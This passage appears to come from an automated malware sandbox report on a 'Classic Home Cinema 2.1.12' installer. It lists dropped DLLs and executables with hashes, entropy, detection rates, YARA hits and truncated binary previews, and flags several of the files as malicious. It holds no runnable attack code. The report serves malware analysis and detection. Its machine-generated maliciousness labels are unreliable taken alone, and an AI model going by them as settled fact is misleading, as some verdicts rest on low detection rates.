                                                                                      SHA-512:B6AC9682FB74DF00ECC5F7E44C0D48548DB3CD35985AA033DE60A4E58B39B7E3838AC23AE993A221DC7B3946001AFA437927B664C7FBFAC91557D44DB0C50969
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.?ig....
                                                                                      Process:C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M:M
                                                                                      MD5:4352D88A78AA39750BF70CD6F27BCAA5
                                                                                      SHA1:3C585604E87F855973731FEA83E21FAB9392D2FC
                                                                                      SHA-256:67ABDD721024F0FF4E0B3F4C2FC13BC5BAD42D0B7851D456D88D203D15AAA450
                                                                                      SHA-512:EDF92E3D4F80FC47D948EA2F17B9BFC742D34E2E785A7A4927F3E261E8BD9D400B648BFF2123B8396D24FB28F5869979E08D58B4B5D156E640344A2C0A54675D
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:....
                                                                                      Process:C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):128
                                                                                      Entropy (8bit):2.9012093522336393
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                      MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                      SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                      SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                      SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                      Malicious:false
                                                                                      Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):78183
                                                                                      Entropy (8bit):7.692742945771669
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
                                                                                      Entropy (8bit):6.204917493416147
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):2776237
                                                                                      Entropy (8bit):6.89792615350219
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:eyMXRWKguE94xBxa9412CZNTPpvyin/ciJQQdR:hlBu04v09412CbTxZ/cXg
                                                                                      MD5:765448A33166E70D7C75392D7E8FC161
                                                                                      SHA1:6EFD4DCAC1045792CBC34AC0DF7B71DDD887468C
                                                                                      SHA-256:B10B4798571466E062ED070548787DC205D774041D593197183BD68544420739
                                                                                      SHA-512:F71113152642359675CDBB0A6FEF08F0922CC978A2909DEBAE0C689145DBFCD2079673E91CDCF32F9B581AF175F08068559D6D284F838D71FE1D3035963B8C96
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....5ig.....................J.......V............@...........................*.......*..............................................`..................................................................................H............................amtt4..:........................... ..`.antt4...4.......6..................@..@.aott4...e.......2..................@....rsrc........`......................@..@.aptt4..............................`.0.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1645320
                                                                                      Entropy (8bit):6.787752063353702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
                                                                                      Entropy (8bit):6.204917493416147
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2776237
                                                                                      Entropy (8bit):6.897925946158875
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:xyMXRWKguE94xBxa9412CZNTPpvyin/ciJQQdR:4lBu04v09412CbTxZ/cXg
                                                                                      MD5:14488CA0E9ECB480700491BA236B41D3
                                                                                      SHA1:CAA9554DF651D5CB054CC4CB19505620A217DBD9
                                                                                      SHA-256:277FB3E35678D323C87099C7625A4695E8BD558493430C1751F6E826EAE7B908
                                                                                      SHA-512:0049D19A2CD38E05AAE9E2F74D98494F3431D3155F0BABA388480F7EE8D26452057FCFD778C0EAAF37109FD0BA98FF95DB2817640B5A357D83A95D32409B0E5C
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-1OQ1J.tmp, Author: Joe Security
                                                                                      Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....5ig.....................J.......V............@...........................*.......*..............................................`..................................................................................H............................amtt4..:........................... ..`.antt4...4.......6..................@..@.aott4...e.......2..................@....rsrc........`......................@..@.aptt4..............................`.0.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):348160
                                                                                      Entropy (8bit):6.542655141037356
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):78183
                                                                                      Entropy (8bit):7.692742945771669
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1645320
                                                                                      Entropy (8bit):6.787752063353702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499712
                                                                                      Entropy (8bit):6.414789978441117
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499712
                                                                                      Entropy (8bit):6.414789978441117
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):348160
                                                                                      Entropy (8bit):6.542655141037356
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):717985
                                                                                      Entropy (8bit):6.514903669143629
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+pIq5MRxyFj:+PcYn5c/rPx37/zHBA6pFptZ1CEoqMRG
                                                                                      MD5:A170DF3B154D2DE2AAAE594B2421E4C7
                                                                                      SHA1:5302C579870D83176682BB41A9D516D7224CA8A6
                                                                                      SHA-256:3484726C89963BBAE4821B645FD582622524F189E10FDC7AF92094D627011D44
                                                                                      SHA-512:1705A73535EE3D73288C29E7C444C9F9106CD1812765800E79ABC5B55DAB68279244DD5502986D45B42E89DAE26D45256F3F6C14CD014E5E1D9C84F767725645
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:InnoSetup Log Classic Home Cinema, version 0x30, 4757 bytes, 621365\user, "C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12"
                                                                                      Category:dropped
                                                                                      Size (bytes):4757
                                                                                      Entropy (8bit):4.733776293847443
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:PFdWr38cpA4cBd9S+eOIhyAa7ICSss/Ln3vX/uwuau8HrubHk37o:NdWr33pA42HIh6ICSsAnXRTfu
                                                                                      MD5:7226E6265D57668BED13743BDE77B165
                                                                                      SHA1:0BC9AF83A61F168BD021E5840602E6251A96B779
                                                                                      SHA-256:F7247E7EE06D9A12F6E5DBD1F9CA5EF01F61ADB9F295E7214CBC33A493FCCD01
                                                                                      SHA-512:D987F97AD391B05C0D2519199A11C92707300BFE1BE94911EE2824B3DC963F6A152369B430E4C0077C892AC8D92057DD604F8B204A62017EA78F4AEB071A287F
                                                                                      Malicious:false
                                                                                      Preview:Inno Setup Uninstall Log (b)....................................Classic Home Cinema.............................................................................................................Classic Home Cinema.............................................................................................................0...........%...........................................................................................................................i........W....621365.user7C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12.........../...;.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):717985
                                                                                      Entropy (8bit):6.514903669143629
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+pIq5MRxyFj:+PcYn5c/rPx37/zHBA6pFptZ1CEoqMRG
                                                                                      MD5:A170DF3B154D2DE2AAAE594B2421E4C7
                                                                                      SHA1:5302C579870D83176682BB41A9D516D7224CA8A6
                                                                                      SHA-256:3484726C89963BBAE4821B645FD582622524F189E10FDC7AF92094D627011D44
                                                                                      SHA-512:1705A73535EE3D73288C29E7C444C9F9106CD1812765800E79ABC5B55DAB68279244DD5502986D45B42E89DAE26D45256F3F6C14CD014E5E1D9C84F767725645
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2560
                                                                                      Entropy (8bit):2.8818118453929262
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                      MD5:A69559718AB506675E907FE49DEB71E9
